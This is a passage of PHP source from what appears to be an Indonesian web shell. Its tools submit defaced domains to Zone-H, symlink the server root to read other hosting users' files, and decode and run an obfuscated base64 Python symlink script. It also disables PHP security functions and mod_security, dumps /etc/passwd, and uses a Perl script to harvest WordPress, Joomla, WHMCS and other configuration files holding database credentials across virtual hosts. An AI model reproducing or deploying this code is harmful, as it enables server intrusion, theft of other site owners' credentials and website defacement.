  672. <td><a href='?dir=$dir&bypass=vhosts' title='Bypass Vhosts'><div class='menumi'>Bypass Vhost</div></a></td>
  673. <td><a href='?dir=$dir&bypass=passwd' title='Bypass etc/passwd' ><div class='menumi'>Bypass etc/passwd</div></a></td>
  674. </tr>
  675. </table>
  676. </center>
  677. <div>";
  678. }
  679. elseif($_GET['do'] == 'symlink') {
  680. echo"<div class='mybox'>
  681. <h2>Symlink Tools</h2>
  682. <center>
  683. <table style='width:30%; align:center;'><tr>
  684. <td><a href='?dir=$dir&symlink=server' title='Symlink server'><div class='menumi'>Symlink server</div></a></td>
  685. <td><a href='?dir=$dir&symlink=404' title='Symlink 404'><div class='menumi'>Symlink 404</div></a></td>
  686. <td><a href='?dir=$dir&symlink=python' title='Bypass symlink python' ><div class='menumi'>Bypass symlink python</div></a></td>
  687. </tr>
  688. </table>
  689. </center>
  690. <div>";
  691. }
  692. //Submiter Tools
  693. elseif($_GET['do'] == 'zoneh') {
  694. if($_POST['submit']) {
  695. $domain = explode("\r\n", $_POST['url']);
  696. $nick = $_POST['nick'];
  697. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  698. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  699. function zoneh($url,$nick) {
  700. $ch = curl_init("http://www.zone-h.com/notify/single");
  701. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  702. curl_setopt($ch, CURLOPT_POST, true);
  703. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  704. return curl_exec($ch);
  705. curl_close($ch);
  706. }
  707. foreach($domain as $url) {
  708. $zoneh = zoneh($url,$nick);
  709. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  710. echo "$url -> <font color=lime>OK</font><br>";
  711. } else {
  712. echo "$url -> <font color=red>ERROR</font><br>";
  713. }
  714. }
  715. } else {
  716. echo "<center><form method='post'>
  717. <u>Defacer</u>: <br>
  718. <input type='text' name='nick' size='50' value='Rx_XinHad'><br>
  719. <u>Domains</u>: <br>
  720. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  721. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  722. </form>";
  723. }
  724. echo "</center>";
  725. }
  726. // Symlink Tools
  727. elseif($_GET['symlink'] == 'server') {
  728. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  729. $d0mains = @file("/etc/named.conf");
  730. ##httaces
  731. if($d0mains){
  732. @mkdir("mewek_sym",0777);
  733. @chdir("mewek_sym");
  734. @exe("ln -s / root");
  735. $file3 = 'Options Indexes FollowSymLinks
  736. DirectoryIndex mewek.htm
  737. AddType text/plain .php
  738. AddHandler text/plain .php
  739. Satisfy Any';
  740. $fp3 = fopen('.htaccess','w');
  741. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  742. echo"<div class='mybox'>
  743. <h2>Symlink Tools</h2>
  744. <center>
  745. <table style='width:30%; align:center;'><tr>
  746. <td><a href='?dir=$dir&symlink=server' title='Symlink server'><div class='menumi'>Symlink server</div></a></td>
  747. <td><a href='?dir=$dir&symlink=404' title='Symlink 404'><div class='menumi'>Symlink 404</div></a></td>
  748. <td><a href='?dir=$dir&symlink=python' title='Bypass symlink python' ><div class='menumi'>Bypass symlink python</div></a></td>
  749. </tr>
  750. </table>
  751. </center>
  752. <div>";
  753. echo "<br>
  754. <table align=center border=1 style='width:60%;border-color:#333333;'>
  755. <tr>
  756. <td align=center><font size=2>S. No.</font></td>
  757. <td align=center><font size=2>Domains</font></td>
  758. <td align=center><font size=2>Users</font></td>
  759. <td align=center><font size=2>Symlink</font></td>
  760. </tr>";
  761. $dcount = 1;
  762. foreach($d0mains as $d0main){
  763. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  764. flush();
  765. if(strlen(trim($domains[1][0])) > 2){
  766. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  767. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  768. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  769. <td>".$user['name']."</td>
  770. <td><a href='$full/mewek_sym/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  771. flush();
  772. $dcount++;}}}
  773. echo "</table>";
  774. }else{
  775. $TEST=@file('/etc/passwd');
  776. if ($TEST){
  777. @mkdir("mewek_sym",0777);
  778. @chdir("mewek_sym");
  779. exe("ln -s / root");
  780. $file3 = 'Options Indexes FollowSymLinks
  781. DirectoryIndex mewek.htm
  782. AddType text/plain .php
  783. AddHandler text/plain .php
  784. Satisfy Any';
  785. $fp3 = fopen('.htaccess','w');
  786. $fw3 = fwrite($fp3,$file3);
  787. @fclose($fp3);
  788. echo "
  789. <table align=center border=1><tr>
  790. <td align=center><font size=3>S. No.</font></td>
  791. <td align=center><font size=3>Users</font></td>
  792. <td align=center><font size=3>Symlink</font></td></tr>";
  793. $dcount = 1;
  794. $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  795. while(!feof($file)){
  796. $s = fgets($file);
  797. $matches = array();
  798. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  799. $matches = str_replace("home/","",$matches[1]);
  800. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  801. continue;
  802. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  803. <td align=center><font class=txt>" . $matches . "</td>";
  804. echo "<td align=center><font class=txt><a href=$full/mewek_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  805. $dcount++;}fclose($file);
  806. echo "</table>";}else{if($os != "Windows"){@mkdir("mewek_sym",0777);@chdir("mewek_sym");@exe("ln -s / root");$file3 = '
  807. Options Indexes FollowSymLinks
  808. DirectoryIndex mewek.htm
  809. AddType text/plain .php
  810. AddHandler text/plain .php
  811. Satisfy Any
  812. ';
  813. $fp3 = fopen('.htaccess','w');
  814. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  815. echo "
  816. <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
  817. <table align=center border=1><tr>
  818. <td align=center><font size=3>ID</font></td>
  819. <td align=center><font size=3>Users</font></td>
  820. <td align=center><font size=3>Symlink</font></td></tr>";
  821. $temp = "";$val1 = 0;$val2 = 1000;
  822. for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  823. if ($uid)$temp .= join(':',$uid)."\n";}
  824. echo '<br/>';$temp = trim($temp);$file5 =
  825. fopen("test.txt","w");
  826. fputs($file5,$temp);
  827. fclose($file5);$dcount = 1;$file =
  828. fopen("test.txt", "r") or exit("Unable to open file!");
  829. while(!feof($file)){$s = fgets($file);$matches = array();
  830. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  831. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  832. continue;
  833. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  834. <td align=center><font class=txt>" . $matches . "</td>";
  835. echo "<td align=center><font class=txt><a href=$full/mewek_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  836. $dcount++;}
  837. fclose($file);
  838. echo "</table></div></center>";unlink("test.txt");
  839. } else
  840. echo "<center><font size=3>Cannot create Symlink</font></center>";
  841. }
  842. }
  843. }
  844. elseif($_GET['symlink'] == 'python') {
  845. $sym_dir = mkdir('mewek_sympy', 0755);
  846. chdir('mewek_sympy');
  847. $file_sym = "sym.py";
  848. $sym_script = "Iy8qUHl0aG9uCgppbXBvcnQgdGltZQppbXBvcnQgb3MKaW1wb3J0IHN5cwppbXBvcnQgcmUKCm9zLnN5c3RlbSgiY29sb3IgQyIpCgpodGEgPSAiXG5GaWxlIDogLmh0YWNjZXNzIC8vIENyZWF0ZWQgU3VjY2Vzc2Z1bGx5IVxuIgpmID0gIkFsbCBQcm9jZXNzZXMgRG9uZSFcblN5bWxpbmsgQnlwYXNzZWQgU3VjY2Vzc2Z1bGx5IVxuIgpwcmludCAiXG4iCnByaW50ICJ+Iio2MApwcmludCAiU3ltbGluayBCeXBhc3MgMjAxNCBieSBNaW5kbGVzcyBJbmplY3RvciAiCnByaW50ICIgICAgICAgICAgICAgIFNwZWNpYWwgR3JlZXR6IHRvIDogUGFrIEN5YmVyIFNrdWxseiIKcHJpbnQgIn4iKjYwCgpvcy5tYWtlZGlycygnbWV3ZWtzeW1weScpCm9zLmNoZGlyKCdtZXdla3N5bXB5JykKCnN1c3I9W10Kc2l0ZXg9W10Kb3Muc3lzdGVtKCJsbiAtcyAvIG1ld2VrLnR4dCIpCgpoID0gIk9wdGlvbnMgSW5kZXhlcyBGb2xsb3dTeW1MaW5rc1xuRGlyZWN0b3J5SW5kZXggbWV3ZWsucGh0bWxcbkFkZFR5cGUgdHh0IC5waHBcbkFkZEhhbmRsZXIgdHh0IC5waHAiCm0gPSBvcGVuKCIuaHRhY2Nlc3MiLCJ3KyIpCm0ud3JpdGUoaCkKbS5jbG9zZSgpCnByaW50IGh0YQoKc2YgPSAiPGh0bWw+PHRpdGxlPlN5bWxpbmsgUHl0aG9uPC90aXRsZT48Y2VudGVyPjxmb250IGNvbG9yPXdoaXRlIHNpemU9NT5TeW1saW5rIEJ5cGFzcyAyMDE3PGJyPjxmb250IHNpemU9ND5NYWRlIEJ5IE1pbmRsZXNzIEluamVjdG9yIDxicj5SZWNvZGVkIEJ5IE1ld2VrPC9mb250PjwvZm9udD48YnI+PGZvbnQgY29sb3I9d2hpdGUgc2l6ZT0zPjx0YWJsZT4iCgpvID0gb3BlbignL2V0Yy9wYXNzd2QnLCdyJykKbz1vLnJlYWQoKQpvID0gcmUuZmluZGFsbCgnL2hvbWUvXHcrJyxvKQoKZm9yIHh1c3IgaW4gbzoKCXh1c3I9eHVzci5yZXBsYWNlKCcvaG9tZS8nLCcnKQoJc3Vzci5hcHBlbmQoeHVzcikKcHJpbnQgIi0iKjMwCnhzaXRlID0gb3MubGlzdGRpcigiL3Zhci9uYW1lZCIpCgpmb3IgeHhzaXRlIGluIHhzaXRlOgoJeHhzaXRlPXh4c2l0ZS5yZXBsYWNlKCIuZGIiLCIiKQoJc2l0ZXguYXBwZW5kKHh4c2l0ZSkKcHJpbnQgZgpwYXRoPW9zLmdldGN3ZCgpCmlmICIvcHVibGljX2h0bWwvIiBpbiBwYXRoOgoJcGF0aD0iL3B1YmxpY19odG1sLyIKZWxzZToKCXBhdGggPSAiL2h0bWwvIgpjb3VudGVyPTEKaXBzPW9wZW4oIm1ld2VrLnBodG1sIiwidyIpCmlwcy53cml0ZShzZikKCmZvciBmdXNyIGluIHN1c3I6Cglmb3IgZnNpdGUgaW4gc2l0ZXg6CgkJZnU9ZnVzclswOjVdCgkJcz1mc2l0ZVswOjVdCgkJaWYgZnU9PXM6CgkJCWlwcy53cml0ZSgiPGJvZHkgYmdjb2xvcj1ibGFjaz48dHI+PHRkIHN0eWxlPWZvbnQtZmFtaWx5OmNhbGlicmk7Zm9udC13ZWlnaHQ6Ym9sZDtjb2xvcjp3aGl0ZTs+JXM8L3RkPjx0ZCBzdHlsZT1mb250LWZhbWlseTpjYWxpYnJpO2ZvbnQtd2VpZ2h0OmJvbGQ7Y29sb3I6cmVkOz4lczwvdGQ+PHRkIHN0eWxlPWZvbnQtZmFtaWx5OmNhbGlicmk7Zm9udC13ZWlnaHQ6Ym9sZDs+PGEgaHJlZj1tZXdlay50eHQvaG9tZS8lcyVzIHRhcmdldD1fYmxhbmsgPiVzPC9hPjwvdGQ+IiUoY291bnRlcixmdXNyLGZ1c3IscGF0aCxmc2l0ZSkp";
  849. $sym = fopen($file_sym, "w");
  850. fwrite($sym, base64_decode($sym_script));
  851. chmod($file_sym, 0755);
  852. $jancok = exe("python sym.py");
  853. echo"<div class='mybox'>
  854. <h2>Symlink Tools</h2>
  855. <center>
  856. <table style='width:30%; align:center;'><tr>
  857. <td><a href='?dir=$dir&symlink=server' title='Symlink server'><div class='menumi'>Symlink server</div></a></td>
  858. <td><a href='?dir=$dir&symlink=404' title='Symlink 404'><div class='menumi'>Symlink 404</div></a></td>
  859. <td><a href='?dir=$dir&symlink=python' title='Bypass symlink python' ><div class='menumi'>Bypass symlink python</div></a></td>
  860. </tr>
  861. </table>
  862. </center>
  863. <div>";
  864. echo "<br><center>Done ... <a href='mewek_sympy/meweksympy/' target='_blank'>Klik Here</a>";
  865. }
  866. elseif ($_GET['symlink'] == '404'){
  867. @error_reporting(0);
  868. @ini_set('display_errors', 0);
  869. echo"<div class='mybox'>
  870. <h2>Symlink Tools</h2>
  871. <center>
  872. <table style='width:30%; align:center;'><tr>
  873. <td><a href='?dir=$dir&symlink=server' title='Symlink server'><div class='menumi'>Symlink server</div></a></td>
  874. <td><a href='?dir=$dir&symlink=404' title='Symlink 404'><div class='menumi'>Symlink 404</div></a></td>
  875. <td><a href='?dir=$dir&symlink=python' title='Bypass symlink python' ><div class='menumi'>Bypass symlink python</div></a></td>
  876. </tr>
  877. </table>
  878. </center>
  879. <div>";
  880. echo '<center>
  881. <form method="post"><br>File Target : <input name="dir" value="/home/user/public_html/wp-config.php">
  882. <br>
  883. <br>Save As: <input name="jnck" value="jmbd.txt"><input name="jmbd" type="submit" value="Eksekusi Gan"></form><br>';
  884. if($_POST['jmbd']){
  885. rmdir("mewek_symlink404");mkdir("mewek_symlink404", 0777);
  886. $dir = $_POST['dir'];
  887. $jnck = $_POST['jnck'];
  888. system("ln -s ".$dir." mewek_symlink404/".$jnck);
  889. symlink($dir,"mewek_symlink404/".$jnck);
  890. $inija = fopen("mewek_symlink404/.htaccess", "w");
  891. fwrite($inija,"ReadmeName ".$jnck."
  892. Options Indexes FollowSymLinks
  893. DirectoryIndex ngeue.htm
  894. AddType text/plain .php
  895. AddHandler text/plain .php
  896. Satisfy Any
  897. ");
  898. echo'<a href="mewek_symlink404/" target="_blank">Klik Gan >:(</a>';
  899. }
  900. }
  901. // Bypass Tools
  902. elseif($_GET['bypass'] == 'vhosts') {
  903. echo"<div class='mybox'>
  904. <h2>Bypass Tools</h2>
  905. <center>
  906. <table style='width:30%; align:center;'><tr>
  907. <td><a href='?dir=$dir&bypass=disablefunc' title='Bypass Disable Functions'><div class='menumi'>Bypass Disable Functions</div></a></td>
  908. <td><a href='?dir=$dir&bypass=vhosts' title='Bypass Vhosts'><div class='menumi'>Bypass Vhost</div></a></td>
  909. <td><a href='?dir=$dir&bypass=passwd' title='Bypass etc/passwd' ><div class='menumi'>Bypass etc/passwd</div></a></td>
  910. </tr>
  911. </table>
  912. </center>
  913. <div>";
  914. echo "<form method='POST' action=''>";
  915. echo "<center><br><font size='6'>Bypass Symlink vHost</font><br><br>";
  916. echo "<center><input type='submit' value='Bypass it' name='Colii'></center>";
  917. if (isset($_POST['Colii'])){
  918. mkdir('symvhosts', 0755);
  919. chdir('symvhosts');
  920. system('ln -s / mewek.txt');
  921. $fvckem ='T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBzc3Nzc3MuaHRtDQpBZGRUeXBlIHR4dCAucGhwDQpBZGRIYW5kbGVyIHR4dCAucGhw';
  922. $file = fopen(".htaccess","w+"); $write = fwrite ($file ,base64_decode($fvckem)); $Bok3p = symlink("/","mewek.txt");
  923. $rt="<br><a href=symvhosts/mewek.txt TARGET='_blank'><font color=#ff0000 size=2 face='Courier New'><b>
  924. Bypassed Successfully</b></font></a>";
  925. echo "<br><br><b>Done.. !</b><br><br>Check link given below for / folder symlink <br>$rt<br>Note: Apabila Forbidden pas buka /var/www/vhosts/Domain.com/ harap tambahkan httpdocs ex:/var/www/vhosts/Domain.com/httpdocs/</center>";}
  926. echo "</form>";
  927. }
  928. elseif($_GET['bypass'] == 'disablefunc'){
  929. echo"<div class='mybox'>
  930. <h2>Bypass Tools</h2>
  931. <center>
  932. <table style='width:30%; align:center;'><tr>
  933. <td><a href='?dir=$dir&bypass=disablefunc' title='Bypass Disable Functions'><div class='menumi'>Bypass Disable Functions</div></a></td>
  934. <td><a href='?dir=$dir&bypass=vhosts' title='Bypass Vhosts'><div class='menumi'>Bypass Vhost</div></a></td>
  935. <td><a href='?dir=$dir&bypass=passwd' title='Bypass etc/passwd' ><div class='menumi'>Bypass etc/passwd</div></a></td>
  936. </tr>
  937. </table>
  938. </center>
  939. <div>";
  940. echo "<br><br><center>";
  941. echo "<form method=post><input type=submit name=ini value='php.ini' />&nbsp;<input type=submit name=htce value='.htaccess' />&nbsp;<input type=submit name=litini value='Litespeed' /></form>";
  942. if(isset($_POST['ini']))
  943. {
  944. $file = fopen("php.ini","w");
  945. echo fwrite($file,"disable_functions=none
  946. safe_mode = Off
  947. ");
  948. fclose($file);
  949. echo "<a href='php.ini'>click here!</a>";
  950. } if(isset($_POST['htce']))
  951. {
  952. $file = fopen(".htaccess","w");
  953. echo fwrite($file,"<IfModule mod_security.c>
  954. SecFilterEngine Off
  955. SecFilterScanPOST Off
  956. </IfModule>
  957. ");
  958. fclose($file);
  959. echo "htaccess successfully created!";
  960. } if(isset($_POST['litini'])){
  961. $iniph = '<? n echo ini_get("safe_mode"); n echo ini_get("open_basedir"); n include($_GET["file"]); n ini_restore("safe_mode"); n ini_restore("open_basedir"); n echo ini_get("safe_mode"); n echo ini_get("open_basedir"); n include($_GET["ss"]; n ?>';
  962. $byph = "safe_mode = Off n disable_functions= ";
  963. $comp="PEZpbGVzICoucGhwPg0KRm9yY2VUeXBlIGFwcGxpY2F0aW9uL3gtaHR0cGQtcGhwNA0KPC9GaWxlcz4=";
  964. file_put_contents("php.ini",base64_decode($byph));
  965. file_put_contents("ini.php",base64_decode($iniph));
  966. file_put_contents(".htaccess",base64_decode($comp));
  967. echo "<script>alert('Disable Functions in Litespeed Created'); hideAll();</script>";
  968. echo"</center>";
  969. }
  970. }
  971. elseif($_GET['bypass'] == 'passwd') {
  972. echo"<div class='mybox'>
  973. <h2>Bypass Tools</h2>
  974. <center>
  975. <table style='width:30%; align:center;'><tr>
  976. <td><a href='?dir=$dir&bypass=disablefunc' title='Bypass Disable Functions'><div class='menumi'>Bypass Disable Functions</div></a></td>
  977. <td><a href='?dir=$dir&bypass=vhosts' title='Bypass Vhosts'><div class='menumi'>Bypass Vhost</div></a></td>
  978. <td><a href='?dir=$dir&bypass=passwd' title='Bypass etc/passwd' ><div class='menumi'>Bypass etc/passwd</div></a></td>
  979. </tr>
  980. </table>
  981. </center>
  982. <div>";
  983. echo '<br><br><center>Bypass etc/passw With:<br>
  984. <table style="width:50%">
  985. <tr>
  986. <td><form method="post"><input type="submit" value="System Function" name="syst"></form></td>
  987. <td><form method="post"><input type="submit" value="Passthru Function" name="passth"></form></td>
  988. <td><form method="post"><input type="submit" value="Exec Function" name="ex"></form></td>
  989. <td><form method="post"><input type="submit" value="Shell_exec Function" name="shex"></form></td>
  990. <td><form method="post"><input type="submit" value="Posix_getpwuid Function" name="melex"></form></td>
  991. </tr></table>Bypass User With : <table style="width:50%">
  992. <tr>
  993. <td><form method="post"><input type="submit" value="Awk Program" name="awkuser"></form></td>
  994. <td><form method="post"><input type="submit" value="System Function" name="systuser"></form></td>
  995. <td><form method="post"><input type="submit" value="Passthru Function" name="passthuser"></form></td>
  996. <td><form method="post"><input type="submit" value="Exec Function" name="exuser"></form></td>
  997. <td><form method="post"><input type="submit" value="Shell_exec Function" name="shexuser"></form></td>
  998. </tr>
  999. </table><br>';
  1000.  
  1001.  
  1002. if ($_POST['awkuser']) {
  1003. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  1004. echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
  1005. echo "</textarea><br>";
  1006. }
  1007. if ($_POST['systuser']) {
  1008. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  1009. echo system("ls /var/mail");
  1010. echo "</textarea><br>";
  1011. }
  1012. if ($_POST['passthuser']) {
  1013. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  1014. echo passthru("ls /var/mail");
  1015. echo "</textarea><br>";
  1016. }
  1017. if ($_POST['exuser']) {
  1018. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  1019. echo exec("ls /var/mail");
  1020. echo "</textarea><br>";
  1021. }
  1022. if ($_POST['shexuser']) {
  1023. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  1024. echo shell_exec("ls /var/mail");
  1025. echo "</textarea><br>";
  1026. }
  1027. if($_POST['syst'])
  1028. {
  1029. echo"<textarea class='inputz' cols='65' rows='15'>";
  1030. echo system("cat /etc/passwd");
  1031. echo"</textarea><br><br><b></b><br>";
  1032. }
  1033. if($_POST['passth'])
  1034. {
  1035. echo"<textarea class='inputz' cols='65' rows='15'>";
  1036. echo passthru("cat /etc/passwd");
  1037. echo"</textarea><br><br><b></b><br>";
  1038. }
  1039. if($_POST['ex'])
  1040. {
  1041. echo"<textarea class='inputz' cols='65' rows='15'>";
  1042. echo exec("cat /etc/passwd");
  1043. echo"</textarea><br><br><b></b><br>";
  1044. }
  1045. if($_POST['shex'])
  1046. {
  1047. echo"<textarea class='inputz' cols='65' rows='15'>";
  1048. echo shell_exec("cat /etc/passwd");
  1049. echo"</textarea><br><br><b></b><br>";
  1050. }
  1051. echo '<center>';
  1052. if($_POST['melex'])
  1053. {
  1054. echo"<textarea class='inputz' cols='65' rows='15'>";
  1055. for($uid=0;$uid<60000;$uid++){
  1056. $ara = posix_getpwuid($uid);
  1057. if (!empty($ara)) {
  1058. while (list ($key, $val) = each($ara)){
  1059. print "$val:";
  1060. }
  1061. print "\n";
  1062. }
  1063. }
  1064. echo"</textarea><br><br>";
  1065. }
  1066. }
  1067.  
  1068. // Grab Config
  1069. elseif($_GET['do'] == 'config') {
  1070. $mwk = mkdir("mewek_config", 0777);
  1071. $isi_htc = "Options FollowSymLinks MultiViews Indexes ExecCGI\nRequire None\nSatisfy Any\nAddType application/x-httpd-cgi .cin\nAddHandler cgi-script .cin\nAddHandler cgi-script .cin";
  1072. $htc = fopen("mewek_config/.htaccess","w");
  1073. fwrite($htc, $isi_htc);
  1074. fclose($htc);
  1075. if(preg_match("/vhosts|vhost/", $dir)) {
  1076. $link_config = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1077. $vhost = "#!/usr/bin/perl -I/usr/local/bandmin
opendir(my $dir , "/var/www/vhosts/");
foreach(sort readdir $dir) {
    my $isDir = 0;
    $isDir = 1 if -d $_;
$sitess = $_;


symlink('/var/www/vhosts/'.$sitess.'/httpdocs/includes/configure.php',$sitess.'-shop.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/os/includes/configure.php',$sitess.'-shop-os.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/oscom/includes/configure.php',$sitess.'-oscom.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/oscommerce/includes/configure.php',$sitess.'-oscommerce.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/oscommerces/includes/configure.php',$sitess.'-oscommerces.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/shop/includes/configure.php',$sitess.'-shop2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/shopping/includes/configure.php',$sitess.'-shop-shopping.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/sale/includes/configure.php',$sitess.'-sale.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/amember/config.inc.php',$sitess.'-amember.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config.inc.php',$sitess.'-amember2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/members/configuration.php',$sitess.'-members.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config.php',$sitess.'-4images1.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forum/includes/config.php',$sitess.'-forum.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forums/includes/config.php',$sitess.'-forums.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/admin/conf.php',$sitess.'-5.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/admin/config.php',$sitess.'-4.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wp/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/WP/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wp/beta/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/beta/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/press/wp-config.php',$sitess.'-wp13-press.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wordpress/wp-config.php',$sitess.'-wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/Wordpress/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/blog/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wordpress/beta/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/news/wp-config.php',$sitess.'-Wordpress-news.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/new/wp-config.php',$sitess.'-Wordpress-new.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/blog/wp-config.php',$sitess.'-Wordpress-blog.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/beta/wp-config.php',$sitess.'-Wordpress-beta.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/blogs/wp-config.php',$sitess.'-Wordpress-blogs.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/home/wp-config.php',$sitess.'-Wordpress-home.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/protal/wp-config.php',$sitess.'-Wordpress-protal.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/site/wp-config.php',$sitess.'-Wordpress-site.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/main/wp-config.php',$sitess.'-Wordpress-main.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/test/wp-config.php',$sitess.'-Wordpress-test.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/arcade/functions/dbclass.php',$sitess.'-ibproarcade.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/arcade/functions/dbclass.php',$sitess.'-ibproarcade.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/joomla/configuration.php',$sitess.'-joomla2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/protal/configuration.php',$sitess.'-joomla-protal.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/joo/configuration.php',$sitess.'-joo.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cms/configuration.php',$sitess.'-joomla-cms.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/site/configuration.php',$sitess.'-joomla-site.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/main/configuration.php',$sitess.'-joomla-main.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/news/configuration.php',$sitess.'-joomla-news.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/new/configuration.php',$sitess.'-joomla-new.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/home/configuration.php',$sitess.'-joomla-home.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/vb/includes/config.php',$sitess.'-vb~config.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/vb3/includes/config.php',$sitess.'-vb3~config.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cc/includes/config.php',$sitess.'-vb1~config.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forum/includes/class_core.php',$sitess.'-vbluttin~class_core.php.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/vb/includes/class_core.php',$sitess.'-vbluttin~class_core.php1.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cc/includes/class_core.php',$sitess.'-vbluttin~class_core.php2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whm/configuration.php',$sitess.'-whm15.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/central/configuration.php',$sitess.'-whm-central.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whm/whmcs/configuration.php',$sitess.'-whm-whmcs.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whm/WHMCS/configuration.php',$sitess.'-whm-WHMCS.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whmc/WHM/configuration.php',$sitess.'-whmc-WHM.txt');
